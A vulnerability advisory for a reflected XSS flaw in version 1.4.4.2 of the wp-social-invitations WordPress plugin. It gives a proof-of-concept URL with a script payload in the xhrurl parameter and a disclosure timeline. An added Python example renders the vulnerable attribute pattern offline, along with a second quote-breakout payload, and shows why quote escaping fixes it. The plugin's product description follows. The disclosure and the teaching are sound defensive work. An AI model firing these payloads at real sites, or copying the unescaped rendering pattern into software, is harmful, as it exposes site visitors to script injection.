wp-plugin : wp-social-invitations – A3-Cross-Site Scripting (XSS)

 

Plugin Details

 

Plugin Name : wp-social-invitations

 

Affected Version : 1.4.4.2 (and most probably lower versions, if any)

 
Vulnerability : A3-Cross-Site Scripting (XSS)
 
Identified by : Prajal Kulkarni

 

 

Technical Details

 

Minimum Level of Access Required : Unauthenticated

 

PoC - (Proof of Concept) :

 

http://127.0.0.1/wordpress/wp-content/wp-plugs/wp-social-invitations/test.php?xhrurl=xhrurl%27%3E%3Cscript%3Ealert%282%29%3C/script%3E

 

Vulnerable Parameter : xhrurl (reflected unescaped by test.php; the decoded payload is xhrurl'><script>alert(2)</script>, whose leading '> is built to close a single-quoted attribute value and its enclosing tag before the injected script element)

 

Trac ChangeLog : https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=848497%40wp-social-invitations&old=829444%40wp-social-invitations&sfp_email=&sfph_mail=#file239
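The page does not show the source of test.php, so the following is an added example, not the plugin's own code: it reconstructs the pattern the PoC implies (the xhrurl request parameter echoed into a single-quoted HTML attribute), recovers the payload from the advisory's PoC URL offline, and checks three renderers with a small parser that flags an injected script element or on* event-handler attribute. The element and attribute names (div, data-xhrurl) are assumptions for illustration; the point it adds beyond the PoC is that escaping only &, < and > (PHP htmlspecialchars() without ENT_QUOTES, for example) still leaves a single-quoted attribute open to a handler-injection payload, whereas escaping quotes as well (what WordPress esc_attr() does) closes both.

```python
"""Reflected XSS in an HTML attribute context: why quote escaping matters.

Added example, not code from the wp-social-invitations plugin. The renderers
below are an assumed reconstruction of the pattern the PoC implies; nothing
here talks to a server.
"""
from html import escape
from html.parser import HTMLParser
from urllib.parse import parse_qs, urlsplit

# The PoC URL from the advisory, used only to recover the payload offline.
POC_URL = ("http://127.0.0.1/wordpress/wp-content/wp-plugs/wp-social-invitations/"
           "test.php?xhrurl=xhrurl%27%3E%3Cscript%3Ealert%282%29%3C/script%3E")

# Constructed second payload: no angle brackets at all, only a quote breakout.
HANDLER_PAYLOAD = "' onmouseover='alert(2)"


def payload_from_poc(url: str) -> str:
    """Return the URL-decoded value of the xhrurl query parameter."""
    return parse_qs(urlsplit(url).query)["xhrurl"][0]


def render_unescaped(xhrurl: str) -> str:
    """Assumed vulnerable pattern: raw GET value inside a single-quoted attribute."""
    return f"<div id='wsi' data-xhrurl='{xhrurl}'></div>"


def render_angle_only(xhrurl: str) -> str:
    """Common half-fix: escape & < > but not quotes (like htmlspecialchars()
    without ENT_QUOTES). Blocks the <script> payload, not a quote breakout."""
    return f"<div id='wsi' data-xhrurl='{escape(xhrurl, quote=False)}'></div>"


def render_escaped(xhrurl: str) -> str:
    """Hardened: quotes are escaped too, so the attribute cannot be closed."""
    return f"<div id='wsi' data-xhrurl='{escape(xhrurl, quote=True)}'></div>"


class InjectionDetector(HTMLParser):
    """Flags a <script> start tag or any on* event-handler attribute."""

    def __init__(self) -> None:
        super().__init__()
        self.injected = False

    def handle_starttag(self, tag, attrs):
        if tag == "script" or any(name.lower().startswith("on") for name, _ in attrs):
            self.injected = True


def executes_script(html: str) -> bool:
    """True if the rendered HTML contains script-bearing markup."""
    detector = InjectionDetector()
    detector.feed(html)
    detector.close()
    return detector.injected


if __name__ == "__main__":
    poc = payload_from_poc(POC_URL)
    for label, render in (("unescaped", render_unescaped),
                          ("angle-only", render_angle_only),
                          ("escaped", render_escaped)):
        print(f"{label:11s} PoC payload -> {executes_script(render(poc))}, "
              f"handler payload -> {executes_script(render(HANDLER_PAYLOAD))}")
```

Run it and the angle-only renderer shows the trap: it passes the advisory's script payload but fails the handler payload, because the single quote that ends the attribute value is never encoded. Only the renderer that escapes quotes rejects both.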

 

Disclosure Timeline

 

Vendor Contacted : 2014-01-21

 
Plugin Status : Updated on 2014-01-30
 
Public Disclosure : 2014-05-28
 
CVE Number : CVE-2014-4597

 
Plugin Description :
 
Allow your visitors to invite friends from their social networks such as Facebook, Twitter, Foursquare, Google, Yahoo, Hotmail and more directly into your WordPress site. This plugin works perfectly with BuddyPress and the Invite Anyone plugin.

Check the [wsi demo](http://wp.timersys.com/wordpress-social-invitations/?utm_source=wsi-free&utm_medium=readme&utm_campaign=wsi)

Full documentation available in [our site](http://wp.timersys.com/wordpress-social-invitations/docs/?utm_source=wsi-free&utm_medium=readme&utm_campaign=wsi)

= Currently Supported Providers =

Facebook, Twitter, Linkedin, Foursquare, Yahoo, Live, Gmail

= Features =

* HTML emails
* Template system to edit visuals or add your branding
* Invitations Queue to handle the different API limits
* Sidebar widget for sidebars
* Predefined invitation messages
* Custom CSS
* Translation ready
* Documentation

= Premium version =

* Content locker - share your content only with users who have invited their friends, using a simple shortcode
* MyCRED & Cubepoints integration
* Bypass registration lock - use the plugin on private, invitation-only sites
* Facebook uses SEND DIALOG
* Linkedin delivers private messages instead of posting into user status
* Twitter delivers Private messages instead of posting a tweet
* GMAIL & SMTP SUPPORT
* Predefined invitations can't be edited by users
* Redirect users after they send invitations
* Change order of providers
* Free Support

Get the premium version on [http://wp.timersys.com/wordpress-social-invitations/](http://wp.timersys.com/wordpress-social-invitations/?utm_source=wsi-free&utm_medium=readme&utm_campaign=wsi)


= Translations Credits =

* Spanish - Eruedados Colombia
* Serbo/Croatian - Borisa Djuraskovic
